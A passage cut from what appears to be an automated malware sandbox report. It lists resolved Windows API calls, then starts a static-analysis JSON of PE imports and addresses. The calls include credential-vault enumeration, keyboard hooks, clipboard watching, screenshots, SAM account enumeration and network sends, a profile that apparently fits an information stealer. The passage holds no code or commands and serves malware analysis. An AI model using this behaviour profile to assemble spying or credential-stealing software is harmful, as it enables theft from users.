  2803. "wminet_utils.dll.BeginEnumeration",
  2804. "wminet_utils.dll.Next",
  2805. "wminet_utils.dll.EndEnumeration",
  2806. "wminet_utils.dll.GetPropertyQualifierSet",
  2807. "wminet_utils.dll.GetObjectText",
  2808. "wminet_utils.dll.SpawnDerivedClass",
  2809. "wminet_utils.dll.SpawnInstance",
  2810. "wminet_utils.dll.CompareTo",
  2811. "wminet_utils.dll.GetPropertyOrigin",
  2812. "wminet_utils.dll.InheritsFrom",
  2813. "wminet_utils.dll.GetMethod",
  2814. "wminet_utils.dll.PutMethod",
  2815. "wminet_utils.dll.DeleteMethod",
  2816. "wminet_utils.dll.BeginMethodEnumeration",
  2817. "wminet_utils.dll.NextMethod",
  2818. "wminet_utils.dll.EndMethodEnumeration",
  2819. "wminet_utils.dll.GetMethodQualifierSet",
  2820. "wminet_utils.dll.GetMethodOrigin",
  2821. "wminet_utils.dll.QualifierSet_Get",
  2822. "wminet_utils.dll.QualifierSet_Put",
  2823. "wminet_utils.dll.QualifierSet_Delete",
  2824. "wminet_utils.dll.QualifierSet_GetNames",
  2825. "wminet_utils.dll.QualifierSet_BeginEnumeration",
  2826. "wminet_utils.dll.QualifierSet_Next",
  2827. "wminet_utils.dll.QualifierSet_EndEnumeration",
  2828. "wminet_utils.dll.GetCurrentApartmentType",
  2829. "wminet_utils.dll.GetDemultiplexedStub",
  2830. "wminet_utils.dll.CreateInstanceEnumWmi",
  2831. "wminet_utils.dll.CreateClassEnumWmi",
  2832. "wminet_utils.dll.ExecQueryWmi",
  2833. "wminet_utils.dll.ExecNotificationQueryWmi",
  2834. "wminet_utils.dll.PutInstanceWmi",
  2835. "wminet_utils.dll.PutClassWmi",
  2836. "wminet_utils.dll.CloneEnumWbemClassObject",
  2837. "wminet_utils.dll.ConnectServerWmi",
  2838. "ole32.dll.CoUninitialize",
  2839. "oleaut32.dll.#500",
  2840. "oleaut32.dll.SysStringLen",
  2841. "kernel32.dll.RtlZeroMemory",
  2842. "kernel32.dll.RegOpenKeyExW",
  2843. "advapi32.dll.GetUserNameW",
  2844. "kernel32.dll.GetComputerNameW",
  2845. "user32.dll.DefWindowProcW",
  2846. "gdi32.dll.GetStockObject",
  2847. "user32.dll.RegisterClassW",
  2848. "user32.dll.CreateWindowExW",
  2849. "user32.dll.SetWindowLongW",
  2850. "user32.dll.GetWindowLongW",
  2851. "kernel32.dll.GetCurrentThread",
  2852. "kernel32.dll.DuplicateHandle",
  2853. "user32.dll.CallWindowProcW",
  2854. "user32.dll.RegisterWindowMessageW",
  2855. "advapi32.dll.LookupPrivilegeValueW",
  2856. "advapi32.dll.AdjustTokenPrivileges",
  2857. "ntdll.dll.NtQuerySystemInformation",
  2858. "kernel32.dll.CreateIoCompletionPort",
  2859. "kernel32.dll.PostQueuedCompletionStatus",
  2860. "ntdll.dll.NtQueryInformationThread",
  2861. "ntdll.dll.NtGetCurrentProcessorNumber",
  2862. "shfolder.dll.SHGetFolderPathW",
  2863. "kernel32.dll.FindFirstFileW",
  2864. "kernel32.dll.FindClose",
  2865. "kernel32.dll.FindNextFileW",
  2866. "kernel32.dll.UnmapViewOfFile",
  2867. "kernel32.dll.ReadFile",
  2868. "oleaut32.dll.#204",
  2869. "oleaut32.dll.#203",
  2870. "culture.dll.ConvertLangIdToCultureName",
  2871. "mlang.dll.#112",
  2872. "wininet.dll.FindFirstUrlCacheEntryA",
  2873. "kernel32.dll.SetFileInformationByHandle",
  2874. "urlmon.dll.CreateUri",
  2875. "kernel32.dll.InitializeSRWLock",
  2876. "kernel32.dll.AcquireSRWLockExclusive",
  2877. "kernel32.dll.AcquireSRWLockShared",
  2878. "kernel32.dll.ReleaseSRWLockExclusive",
  2879. "kernel32.dll.ReleaseSRWLockShared",
  2880. "wininet.dll.FindNextUrlCacheEntryA",
  2881. "urlmon.dll.CreateIUriBuilder",
  2882. "urlmon.dll.IntlPercentEncodeNormalize",
  2883. "wininet.dll.FindCloseUrlCache",
  2884. "cryptsp.dll.CryptGetHashParam",
  2885. "cryptsp.dll.CryptReleaseContext",
  2886. "vaultcli.dll.VaultEnumerateVaults",
  2887. "user32.dll.GetLastInputInfo",
  2888. "ole32.dll.CLSIDFromProgIDEx",
  2889. "oleaut32.dll.#201",
  2890. "user32.dll.SetWindowsHookExW",
  2891. "user32.dll.SetClipboardViewer",
  2892. "ole32.dll.OleInitialize",
  2893. "ole32.dll.OleGetClipboard",
  2894. "kernel32.dll.GlobalLock",
  2895. "kernel32.dll.GlobalUnlock",
  2896. "kernel32.dll.GlobalFree",
  2897. "user32.dll.SendMessageW",
  2898. "user32.dll.GetClientRect",
  2899. "user32.dll.GetWindowRect",
  2900. "user32.dll.GetParent",
  2901. "ole32.dll.CoRegisterMessageFilter",
  2902. "user32.dll.PeekMessageW",
  2903. "user32.dll.WaitMessage",
  2904. "mscoree.dll.ND_RI2",
  2905. "rasapi32.dll.RasEnumConnectionsW",
  2906. "rtutils.dll.TraceRegisterExA",
  2907. "rtutils.dll.TracePrintfExA",
  2908. "sechost.dll.OpenSCManagerW",
  2909. "sechost.dll.OpenServiceW",
  2910. "sechost.dll.QueryServiceStatus",
  2911. "sechost.dll.CloseServiceHandle",
  2912. "ws2_32.dll.WSAStartup",
  2913. "ws2_32.dll.WSASocketW",
  2914. "ws2_32.dll.setsockopt",
  2915. "ws2_32.dll.WSAEventSelect",
  2916. "ws2_32.dll.ioctlsocket",
  2917. "ws2_32.dll.closesocket",
  2918. "advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
  2919. "kernel32.dll.LocalFree",
  2920. "kernel32.dll.CreateFileMappingW",
  2921. "kernel32.dll.VirtualQuery",
  2922. "kernel32.dll.ReleaseMutex",
  2923. "advapi32.dll.CreateWellKnownSid",
  2924. "kernel32.dll.CreateMutexW",
  2925. "kernel32.dll.WaitForSingleObject",
  2926. "kernel32.dll.OpenMutexW",
  2927. "kernel32.dll.OpenProcess",
  2928. "kernel32.dll.GetProcessTimes",
  2929. "ws2_32.dll.WSAIoctl",
  2930. "kernel32.dll.FormatMessageW",
  2931. "rasapi32.dll.RasConnectionNotificationW",
  2932. "advapi32.dll.RegOpenCurrentUser",
  2933. "advapi32.dll.RegNotifyChangeKeyValue",
  2934. "sechost.dll.NotifyServiceStatusChangeA",
  2935. "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
  2936. "kernel32.dll.ResetEvent",
  2937. "iphlpapi.dll.GetNetworkParams",
  2938. "dnsapi.dll.DnsQueryConfig",
  2939. "iphlpapi.dll.GetAdaptersAddresses",
  2940. "iphlpapi.dll.GetIpInterfaceEntry",
  2941. "iphlpapi.dll.GetBestInterfaceEx",
  2942. "ws2_32.dll.inet_addr",
  2943. "ws2_32.dll.getaddrinfo",
  2944. "ws2_32.dll.freeaddrinfo",
  2945. "ws2_32.dll.WSAConnect",
  2946. "ws2_32.dll.send",
  2947. "ws2_32.dll.recv",
  2948. "kernel32.dll.GetTempPathW",
  2949. "user32.dll.GetDC",
  2950. "user32.dll.GetMonitorInfoW",
  2951. "gdi32.dll.GetDeviceCaps",
  2952. "user32.dll.ReleaseDC",
  2953. "user32.dll.GetProcessWindowStation",
  2954. "user32.dll.GetUserObjectInformationA",
  2955. "kernel32.dll.SetConsoleCtrlHandler",
  2956. "user32.dll.GetClassInfoW",
  2957. "user32.dll.MsgWaitForMultipleObjectsEx",
  2958. "kernel32.dll.FindAtomW",
  2959. "kernel32.dll.AddAtomW",
  2960. "mscoree.dll.LoadLibraryShim",
  2961. "gdiplus.dll.GdiplusStartup",
  2962. "user32.dll.GetWindowInfo",
  2963. "user32.dll.GetAncestor",
  2964. "user32.dll.EnumDisplayDevicesA",
  2965. "gdi32.dll.ExtTextOutW",
  2966. "gdiplus.dll.GdipCreateBitmapFromScan0",
  2967. "gdiplus.dll.GdipGetImageEncodersSize",
  2968. "gdiplus.dll.GdipGetImageEncoders",
  2969. "kernel32.dll.RtlMoveMemory",
  2970. "mscoree.dll.ND_WI4",
  2971. "gdiplus.dll.GdipGetImagePixelFormat",
  2972. "gdiplus.dll.GdipGetImageGraphicsContext",
  2973. "gdi32.dll.GetCurrentObject",
  2974. "gdiplus.dll.GdipGetDC",
  2975. "gdi32.dll.BitBlt",
  2976. "gdiplus.dll.GdipReleaseDC",
  2977. "gdiplus.dll.GdipSaveImageToFile",
  2978. "windowscodecs.dll.DllGetClassObject",
  2979. "kernel32.dll.WerRegisterMemoryBlock",
  2980. "oleaut32.dll.#8",
  2981. "oleaut32.dll.#10",
  2982. "oleaut32.dll.#200",
  2983. "kernel32.dll.GlobalMemoryStatusEx",
  2984. "kernel32.dll.CreateSemaphoreA",
  2985. "ws2_32.dll.shutdown",
  2986. "kernel32.dll.DeleteFileW",
  2987. "ole32.dll.CoCreateGuid",
  2988. "vssapi.dll.CreateWriter",
  2989. "advapi32.dll.LookupAccountNameW",
  2990. "samcli.dll.NetLocalGroupGetMembers",
  2991. "samlib.dll.SamConnect",
  2992. "rpcrt4.dll.NdrClientCall3",
  2993. "rpcrt4.dll.RpcStringBindingComposeW",
  2994. "rpcrt4.dll.RpcBindingFromStringBindingW",
  2995. "rpcrt4.dll.RpcStringFreeW",
  2996. "rpcrt4.dll.RpcBindingFree",
  2997. "samlib.dll.SamOpenDomain",
  2998. "samlib.dll.SamLookupNamesInDomain",
  2999. "samlib.dll.SamOpenAlias",
  3000. "samlib.dll.SamFreeMemory",
  3001. "samlib.dll.SamCloseHandle",
  3002. "samlib.dll.SamGetMembersInAlias",
  3003. "netutils.dll.NetApiBufferFree",
  3004. "samlib.dll.SamEnumerateDomainsInSamServer",
  3005. "samlib.dll.SamLookupDomainInSamServer",
  3006. "ole32.dll.StringFromCLSID",
  3007. "propsys.dll.VariantToPropVariant",
  3008. "wbemcore.dll.Reinitialize",
  3009. "wbemsvc.dll.DllGetClassObject",
  3010. "wbemsvc.dll.DllCanUnloadNow",
  3011. "authz.dll.AuthzInitializeContextFromToken",
  3012. "authz.dll.AuthzInitializeObjectAccessAuditEvent2",
  3013. "authz.dll.AuthzAccessCheck",
  3014. "authz.dll.AuthzFreeAuditEvent",
  3015. "authz.dll.AuthzFreeContext",
  3016. "authz.dll.AuthzInitializeResourceManager",
  3017. "authz.dll.AuthzFreeResourceManager",
  3018. "rpcrt4.dll.RpcBindingCreateW",
  3019. "rpcrt4.dll.RpcBindingBind",
  3020. "rpcrt4.dll.I_RpcMapWin32Status",
  3021. "advapi32.dll.EventRegister",
  3022. "advapi32.dll.EventUnregister",
  3023. "advapi32.dll.EventWrite",
  3024. "kernel32.dll.RegCloseKey",
  3025. "kernel32.dll.RegSetValueExW",
  3026. "kernel32.dll.RegQueryValueExW",
  3027. "wmisvc.dll.IsImproperShutdownDetected",
  3028. "wevtapi.dll.EvtRender",
  3029. "wevtapi.dll.EvtNext",
  3030. "wevtapi.dll.EvtClose",
  3031. "wevtapi.dll.EvtQuery",
  3032. "wevtapi.dll.EvtCreateRenderContext",
  3033. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
  3034. "rpcrt4.dll.RpcBindingSetOption",
  3035. "ole32.dll.CoCreateFreeThreadedMarshaler",
  3036. "ole32.dll.CreateStreamOnHGlobal",
  3037. "advapi32.dll.RegCreateKeyExW",
  3038. "advapi32.dll.RegSetValueExW",
  3039. "kernelbase.dll.InitializeAcl",
  3040. "kernelbase.dll.AddAce",
  3041. "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
  3042. "kernel32.dll.IsThreadAFiber",
  3043. "kernel32.dll.OpenProcessToken",
  3044. "kernelbase.dll.GetTokenInformation",
  3045. "kernelbase.dll.DuplicateTokenEx",
  3046. "kernelbase.dll.AdjustTokenPrivileges",
  3047. "kernelbase.dll.AllocateAndInitializeSid",
  3048. "kernelbase.dll.CheckTokenMembership",
  3049. "kernel32.dll.SetThreadToken",
  3050. "oleaut32.dll.#285",
  3051. "oleaut32.dll.#12",
  3052. "oleaut32.dll.#286",
  3053. "ole32.dll.CLSIDFromString",
  3054. "oleaut32.dll.#17",
  3055. "oleaut32.dll.#20",
  3056. "oleaut32.dll.#19",
  3057. "oleaut32.dll.#25",
  3058. "authz.dll.AuthzInitializeContextFromSid",
  3059. "ole32.dll.CoRevertToSelf",
  3060. "advapi32.dll.LogonUserExExW",
  3061. "sspicli.dll.LogonUserExExW",
  3062. "ole32.dll.CoGetCallContext",
  3063. "ole32.dll.CoImpersonateClient",
  3064. "advapi32.dll.OpenThreadToken",
  3065. "ole32.dll.CoSwitchCallContext",
  3066. "oleaut32.dll.#287",
  3067. "oleaut32.dll.#288",
  3068. "oleaut32.dll.#289",
  3069. "advapi32.dll.WmiMofEnumerateResourcesW",
  3070. "advapi32.dll.WmiFreeBuffer",
  3071. "kernel32.dll.SortGetHandle",
  3072. "kernel32.dll.SortCloseHandle",
  3073. "ntmarta.dll.GetMartaExtensionInterface",
  3074. "fastprox.dll.DllGetClassObject",
  3075. "fastprox.dll.DllCanUnloadNow",
  3076. "oleaut32.dll.#290",
  3077. "wmi.dll.WmiQueryAllDataW",
  3078. "wmi.dll.WmiQuerySingleInstanceW",
  3079. "wmi.dll.WmiSetSingleItemW",
  3080. "wmi.dll.WmiSetSingleInstanceW",
  3081. "wmi.dll.WmiExecuteMethodW",
  3082. "wmi.dll.WmiNotificationRegistrationW",
  3083. "wmi.dll.WmiMofEnumerateResourcesW",
  3084. "wmi.dll.WmiFileHandleToInstanceNameW",
  3085. "wmi.dll.WmiDevInstToInstanceNameW",
  3086. "wmi.dll.WmiQueryGuidInformation",
  3087. "wmi.dll.WmiOpenBlock",
  3088. "wmi.dll.WmiCloseBlock",
  3089. "wmi.dll.WmiFreeBuffer",
  3090. "wmi.dll.WmiEnumerateGuids",
  3091. "winbrand.dll.BrandingLoadString",
  3092. "security.dll.InitSecurityInterfaceW",
  3093. "cryptsp.dll.SystemFunction035",
  3094. "schannel.dll.SpUserModeInitialize",
  3095. "ntdll.dll.RtlInitUnicodeString",
  3096. "ntdll.dll.RtlFreeUnicodeString",
  3097. "ntdll.dll.NtSetSystemEnvironmentValue",
  3098. "ntdll.dll.NtQuerySystemEnvironmentValue",
  3099. "ntdll.dll.NtCreateFile",
  3100. "ntdll.dll.NtQueryDirectoryObject",
  3101. "ntdll.dll.NtQueryObject",
  3102. "ntdll.dll.NtOpenDirectoryObject",
  3103. "ntdll.dll.NtQueryInformationProcess",
  3104. "ntdll.dll.NtQueryInformationToken",
  3105. "ntdll.dll.NtOpenFile",
  3106. "ntdll.dll.NtClose",
  3107. "ntdll.dll.NtFsControlFile",
  3108. "ntdll.dll.NtQueryVolumeInformationFile",
  3109. "netapi32.dll.NetGroupEnum",
  3110. "netapi32.dll.NetGroupGetInfo",
  3111. "netapi32.dll.NetGroupSetInfo",
  3112. "netapi32.dll.NetLocalGroupGetInfo",
  3113. "netapi32.dll.NetLocalGroupSetInfo",
  3114. "netapi32.dll.NetGroupGetUsers",
  3115. "netapi32.dll.NetLocalGroupGetMembers",
  3116. "netapi32.dll.NetLocalGroupEnum",
  3117. "netapi32.dll.NetShareEnum",
  3118. "netapi32.dll.NetShareGetInfo",
  3119. "netapi32.dll.NetShareAdd",
  3120. "netapi32.dll.NetShareEnumSticky",
  3121. "netapi32.dll.NetShareSetInfo",
  3122. "netapi32.dll.NetShareDel",
  3123. "netapi32.dll.NetShareDelSticky",
  3124. "netapi32.dll.NetShareCheck",
  3125. "netapi32.dll.NetUserEnum",
  3126. "netapi32.dll.NetUserGetInfo",
  3127. "netapi32.dll.NetUserSetInfo",
  3128. "netapi32.dll.NetApiBufferFree",
  3129. "netapi32.dll.NetQueryDisplayInformation",
  3130. "netapi32.dll.NetServerSetInfo",
  3131. "netapi32.dll.NetServerGetInfo",
  3132. "netapi32.dll.NetGetDCName",
  3133. "netapi32.dll.NetWkstaGetInfo",
  3134. "netapi32.dll.NetGetAnyDCName",
  3135. "netapi32.dll.NetServerEnum",
  3136. "netapi32.dll.NetUserModalsGet",
  3137. "netapi32.dll.NetScheduleJobAdd",
  3138. "netapi32.dll.NetScheduleJobDel",
  3139. "netapi32.dll.NetScheduleJobEnum",
  3140. "netapi32.dll.NetScheduleJobGetInfo",
  3141. "netapi32.dll.NetUseGetInfo",
  3142. "netapi32.dll.NetEnumerateTrustedDomains",
  3143. "netapi32.dll.DsGetDcNameW",
  3144. "netapi32.dll.DsRoleGetPrimaryDomainInformation",
  3145. "netapi32.dll.DsRoleFreeMemory",
  3146. "netapi32.dll.NetRenameMachineInDomain",
  3147. "netapi32.dll.NetJoinDomain",
  3148. "netapi32.dll.NetUnjoinDomain",
  3149. "wkscli.dll.NetWkstaGetInfo",
  3150. "cscapi.dll.CscNetApiGetInterface",
  3151. "kernel32.dll.GetDiskFreeSpaceExW",
  3152. "kernel32.dll.GetVolumePathNameW",
  3153. "kernel32.dll.CreateToolhelp32Snapshot",
  3154. "kernel32.dll.Thread32First",
  3155. "kernel32.dll.Thread32Next",
  3156. "kernel32.dll.Process32First",
  3157. "kernel32.dll.Process32Next",
  3158. "kernel32.dll.Module32First",
  3159. "kernel32.dll.Module32Next",
  3160. "kernel32.dll.Heap32ListFirst",
  3161. "kernel32.dll.GetSystemDefaultUILanguage",
  3162. "oleaut32.dll.#15",
  3163. "oleaut32.dll.#26",
  3164. "oleaut32.dll.#150",
  3165. "wtsapi32.dll.WTSEnumerateSessionsW",
  3166. "winsta.dll.WinStationEnumerateW",
  3167. "rpcrt4.dll.I_RpcExceptionFilter",
  3168. "winsta.dll.WinStationFreeMemory",
  3169. "wtsapi32.dll.WTSQuerySessionInformationW",
  3170. "winsta.dll.WinStationQueryInformationW",
  3171. "wtsapi32.dll.WTSFreeMemory",
  3172. "devobj.dll.DevObjCreateDeviceInfoList",
  3173. "devobj.dll.DevObjGetClassDevs",
  3174. "devobj.dll.DevObjEnumDeviceInfo",
  3175. "devobj.dll.DevObjDestroyDeviceInfoList",
  3176. "powrprof.dll.PowerDeterminePlatformRole",
  3177. "oleaut32.dll.#40",
  3178. "oleaut32.dll.#23",
  3179. "oleaut32.dll.#24",
  3180. "oleaut32.dll.#16",
  3181. "advapi32.dll.InitiateSystemShutdownExW",
  3182. "ole32.dll.CoInitializeSecurity",
  3183. "w32time.dll.SvchostEntry_W32Time",
  3184. "w32time.dll.SvchostPushServiceGlobals",
  3185. "ws2_32.dll.#115",
  3186. "ws2_32.dll.#111",
  3187. "userenv.dll.RegisterGPNotification",
  3188. "gpapi.dll.RegisterGPNotificationInternal",
  3189. "sechost.dll.QueryServiceConfigW",
  3190. "dsrole.dll.DsRoleGetPrimaryDomainInformation",
  3191. "dsrole.dll.DsRoleFreeMemory",
  3192. "sspicli.dll.LsaRegisterPolicyChangeNotification",
  3193. "w32time.dll.TimeProvClose",
  3194. "w32time.dll.TimeProvCommand",
  3195. "w32time.dll.TimeProvOpen",
  3196. "ws2_32.dll.#23",
  3197. "ws2_32.dll.#21",
  3198. "ws2_32.dll.#2",
  3199. "vmictimeprovider.dll.TimeProvClose",
  3200. "vmictimeprovider.dll.TimeProvCommand",
  3201. "vmictimeprovider.dll.TimeProvOpen",
  3202. "ws2_32.dll.GetAddrInfoW",
  3203. "advapi32.dll.EventEnabled",
  3204. "ws2_32.dll.FreeAddrInfoW",
  3205. "ws2_32.dll.WSAAddressToStringW",
  3206. "ws2_32.dll.#3",
  3207. "ws2_32.dll.#116",
  3208. "sspicli.dll.LsaUnregisterPolicyChangeNotification",
  3209. "userenv.dll.UnregisterGPNotification",
  3210. "gpapi.dll.UnregisterGPNotificationInternal",
  3211. "psapi.dll.EnumProcesses"
  3212. ]
  3213.  
  3214. [*] Static Analysis: {
  3215. "pe": {
  3216. "peid_signatures": null,
  3217. "imports": [
  3218. {
  3219. "imports": [
  3220. {
  3221. "name": "DeleteCriticalSection",
  3222. "address": "0x476168"
  3223. },
  3224. {
  3225. "name": "LeaveCriticalSection",
  3226. "address": "0x47616c"
  3227. },
  3228. {
  3229. "name": "EnterCriticalSection",
  3230. "address": "0x476170"
  3231. },
  3232. {
  3233. "name": "InitializeCriticalSection",
  3234. "address": "0x476174"
  3235. },
  3236. {
  3237. "name": "VirtualFree",
  3238. "address": "0x476178"
  3239. },
  3240. {
  3241. "name": "VirtualAlloc",
  3242. "address": "0x47617c"
  3243. },
  3244. {
  3245. "name": "LocalFree",
  3246. "address": "0x476180"
  3247. },
  3248. {
  3249. "name": "LocalAlloc",
  3250. "address": "0x476184"
  3251. },
  3252. {
  3253. "name": "GetVersion",
  3254. "address": "0x476188"
  3255. },
  3256. {
  3257. "name": "GetCurrentThreadId",
  3258. "address": "0x47618c"
  3259. },
  3260. {
  3261. "name": "InterlockedDecrement",
  3262. "address": "0x476190"
  3263. },
  3264. {
  3265. "name": "InterlockedIncrement",
  3266. "address": "0x476194"
  3267. },
  3268. {
  3269. "name": "VirtualQuery",
  3270. "address": "0x476198"
  3271. },
  3272. {
  3273. "name": "WideCharToMultiByte",
  3274. "address": "0x47619c"
  3275. },
  3276. {
  3277. "name": "MultiByteToWideChar",
  3278. "address": "0x4761a0"
  3279. },
  3280. {
  3281. "name": "lstrlenA",
  3282. "address": "0x4761a4"
  3283. },
  3284. {
  3285. "name": "lstrcpynA",
  3286. "address": "0x4761a8"
  3287. },
  3288. {
  3289. "name": "LoadLibraryExA",
  3290. "address": "0x4761ac"
  3291. },
  3292. {
  3293. "name": "GetThreadLocale",
  3294. "address": "0x4761b0"
  3295. },
  3296. {
  3297. "name": "GetStartupInfoA",
  3298. "address": "0x4761b4"
  3299. },
  3300. {
  3301. "name": "GetProcAddress",
  3302. "address": "0x4761b8"
  3303. },
  3304. {
  3305. "name": "GetModuleHandleA",
  3306. "address": "0x4761bc"
  3307. },
  3308. {
  3309. "name": "GetModuleFileNameA",
  3310. "address": "0x4761c0"
  3311. },
  3312. {
  3313. "name": "GetLocaleInfoA",
  3314. "address": "0x4761c4"
  3315. },
  3316. {
  3317. "name": "GetCommandLineA",
  3318. "address": "0x4761c8"
  3319. },
  3320. {
  3321. "name": "FreeLibrary",
  3322. "address": "0x4761cc"
  3323. },
  3324. {
  3325. "name": "FindFirstFileA",
  3326. "address": "0x4761d0"
  3327. },
  3328. {
  3329. "name": "FindClose",
  3330. "address": "0x4761d4"
  3331. },
  3332. {
  3333. "name": "ExitProcess",
  3334. "address": "0x4761d8"
  3335. },
  3336. {
  3337. "name": "ExitThread",
  3338. "address": "0x4761dc"
  3339. },
  3340. {
  3341. "name": "CreateThread",
  3342. "address": "0x4761e0"
  3343. },
  3344. {
  3345. "name": "WriteFile",
  3346. "address": "0x4761e4"
  3347. },
  3348. {
  3349. "name": "UnhandledExceptionFilter",
  3350. "address": "0x4761e8"
  3351. },
  3352. {
  3353. "name": "RtlUnwind",
  3354. "address": "0x4761ec"
  3355. },
  3356. {
  3357. "name": "RaiseException",
  3358. "address": "0x4761f0"
  3359. },
  3360. {
  3361. "name": "GetStdHandle",
  3362. "address": "0x4761f4"
  3363. }
  3364. ],
  3365. "dll": "kernel32.dll"
  3366. },
  3367. {
  3368. "imports": [
  3369. {
  3370. "name": "GetKeyboardType",
  3371. "address": "0x4761fc"
  3372. },
  3373. {
  3374. "name": "LoadStringA",
  3375. "address": "0x476200"
  3376. },
  3377. {
  3378. "name": "MessageBoxA",
  3379. "address": "0x476204"
  3380. },
  3381. {
  3382. "name": "CharNextA",
  3383. "address": "0x476208"
  3384. }
  3385. ],
  3386. "dll": "user32.dll"
  3387. },
  3388. {
  3389. "imports": [
  3390. {
  3391. "name": "RegQueryValueExA",
  3392. "address": "0x476210"
  3393. },
  3394. {
  3395. "name": "RegOpenKeyExA",
  3396. "address": "0x476214"
  3397. },
  3398. {
  3399. "name": "RegCloseKey",
  3400. "address": "0x476218"
  3401. }
  3402. ],
  3403. "dll": "advapi32.dll"
  3404. },
  3405. {
  3406. "imports": [
  3407. {
  3408. "name": "SysFreeString",
  3409. "address": "0x476220"
  3410. },
  3411. {
  3412. "name": "SysReAllocStringLen",
  3413. "address": "0x476224"
  3414. },
  3415. {
  3416. "name": "SysAllocStringLen",
  3417. "address": "0x476228"
  3418. }
  3419. ],
  3420. "dll": "oleaut32.dll"
  3421. },
  3422. {
  3423. "imports": [
  3424. {
  3425. "name": "TlsSetValue",
  3426. "address": "0x476230"
  3427. },
  3428. {
  3429. "name": "TlsGetValue",
  3430. "address": "0x476234"
  3431. },
  3432. {
  3433. "name": "LocalAlloc",
  3434. "address": "0x476238"
  3435. },
  3436. {
  3437. "name": "GetModuleHandleA",
  3438. "address": "0x47623c"
  3439. }
  3440. ],
  3441. "dll": "kernel32.dll"
  3442. },
  3443. {
  3444. "imports": [
  3445. {
  3446. "name": "RegQueryValueExA",
  3447. "address": "0x476244"
  3448. },
  3449. {
  3450. "name": "RegOpenKeyExA",
  3451. "address": "0x476248"
  3452. },
  3453. {
  3454. "name": "RegCloseKey",
  3455. "address": "0x47624c"
  3456. }
  3457. ],
  3458. "dll": "advapi32.dll"
  3459. },
  3460. {
  3461. "imports": [
  3462. {
  3463. "name": "lstrcpyA",
  3464. "address": "0x476254"
  3465. },
  3466. {
  3467. "name": "WriteFile",
  3468. "address": "0x476258"
  3469. },
  3470. {
  3471. "name": "WaitForSingleObject",
  3472. "address": "0x47625c"
  3473. },
  3474. {
  3475. "name": "VirtualQuery",
  3476. "address": "0x476260"
  3477. },
  3478. {
  3479. "name": "VirtualAlloc",
  3480. "address": "0x476264"
  3481. },
  3482. {
  3483. "name": "SuspendThread",
  3484. "address": "0x476268"
  3485. },
  3486. {
  3487. "name": "Sleep",
  3488. "address": "0x47626c"
  3489. },
  3490. {
  3491. "name": "SizeofResource",
  3492. "address": "0x476270"
  3493. },
  3494. {
  3495. "name": "SetThreadPriority",
  3496. "address": "0x476274"
  3497. },
  3498. {
  3499. "name": "SetThreadLocale",
  3500. "address": "0x476278"
  3501. },
  3502. {
  3503. "name": "SetFilePointer",
  3504. "address": "0x47627c"
  3505. },
  3506. {
  3507. "name": "SetEvent",
  3508. "address": "0x476280"
  3509. },
  3510. {
  3511. "name": "SetErrorMode",
  3512. "address": "0x476284"
  3513. },
  3514. {
  3515. "name": "SetEndOfFile",
  3516. "address": "0x476288"
  3517. },
  3518. {
  3519. "name": "ResumeThread",
  3520. "address": "0x47628c"
  3521. },
  3522. {
  3523. "name": "ResetEvent",
  3524. "address": "0x476290"
  3525. },
  3526. {
  3527. "name": "ReadFile",
  3528. "address": "0x476294"
  3529. },
  3530. {
  3531. "name": "MultiByteToWideChar",
  3532. "address": "0x476298"
  3533. },
  3534. {
  3535. "name": "MulDiv",
  3536. "address": "0x47629c"
  3537. },
  3538. {
  3539. "name": "LockResource",
  3540. "address": "0x4762a0"
  3541. },
  3542. {
  3543. "name": "LoadResource",
  3544. "address": "0x4762a4"
  3545. },
  3546. {
  3547. "name": "LoadLibraryA",
  3548. "address": "0x4762a8"
  3549. },
  3550. {
  3551. "name": "LeaveCriticalSection",
  3552. "address": "0x4762ac"
  3553. },
  3554. {
  3555. "name": "InitializeCriticalSection",
  3556. "address": "0x4762b0"
  3557. },
  3558. {
  3559. "name": "GlobalUnlock",
  3560. "address": "0x4762b4"
  3561. },
  3562. {
  3563. "name": "GlobalSize",
  3564. "address": "0x4762b8"
  3565. },
  3566. {
  3567. "name": "GlobalReAlloc",
  3568. "address": "0x4762bc"
  3569. },
  3570. {
  3571. "name": "GlobalHandle",
  3572. "address": "0x4762c0"
  3573. },
  3574. {
  3575. "name": "GlobalLock",
  3576. "address": "0x4762c4"
  3577. },
  3578. {
  3579. "name": "GlobalFree",
  3580. "address": "0x4762c8"
  3581. },
  3582. {
  3583. "name": "GlobalFindAtomA",
  3584. "address": "0x4762cc"
  3585. },
  3586. {
  3587. "name": "GlobalDeleteAtom",
  3588. "address": "0x4762d0"
  3589. },
  3590. {
  3591. "name": "GlobalAlloc",
  3592. "address": "0x4762d4"
  3593. },
  3594. {
  3595. "name": "GlobalAddAtomA",
  3596. "address": "0x4762d8"
  3597. },
  3598. {
  3599. "name": "GetVersionExA",
  3600. "address": "0x4762dc"
  3601. },
  3602. {
  3603. "name": "GetVersion",
  3604. "address": "0x4762e0"
  3605. },
  3606. {
  3607. "name": "GetUserDefaultLCID",
  3608. "address": "0x4762e4"
  3609. },
  3610. {
  3611. "name": "GetTickCount",
  3612. "address": "0x4762e8"
  3613. },
  3614. {
  3615. "name": "GetThreadLocale",
  3616. "address": "0x4762ec"
  3617. },
  3618. {
  3619. "name": "GetTempPathA",
  3620. "address": "0x4762f0"
  3621. },
  3622. {
  3623. "name": "GetSystemInfo",
  3624. "address": "0x4762f4"
  3625. },
  3626. {
  3627. "name": "GetStringTypeExA",
  3628. "address": "0x4762f8"
  3629. },
  3630. {
  3631. "name": "GetStdHandle",
  3632. "address": "0x4762fc"
  3633. },
  3634. {
  3635. "name": "GetProfileStringA",
  3636. "address": "0x476300"
  3637. },
  3638. {
  3639. "name": "GetProcAddress",
  3640. "address": "0x476304"
  3641. },
  3642. {
  3643. "name": "GetModuleHandleA",
  3644. "address": "0x476308"
  3645. },
  3646. {
  3647. "name": "GetModuleFileNameA",
  3648. "address": "0x47630c"
  3649. },
  3650. {
  3651. "name": "GetLocaleInfoA",
  3652. "address": "0x476310"
  3653. },
  3654. {
  3655. "name": "GetLocalTime",
  3656. "address": "0x476314"
  3657. },
  3658. {
  3659. "name": "GetLastError",
  3660. "address": "0x476318"
  3661. },
  3662. {
  3663. "name": "GetFullPathNameA",
  3664. "address": "0x47631c"
  3665. },
  3666. {
  3667. "name": "GetFileSize",
  3668. "address": "0x476320"
  3669. },
  3670. {
  3671. "name": "GetExitCodeThread",
  3672. "address": "0x476324"
  3673. },
  3674. {
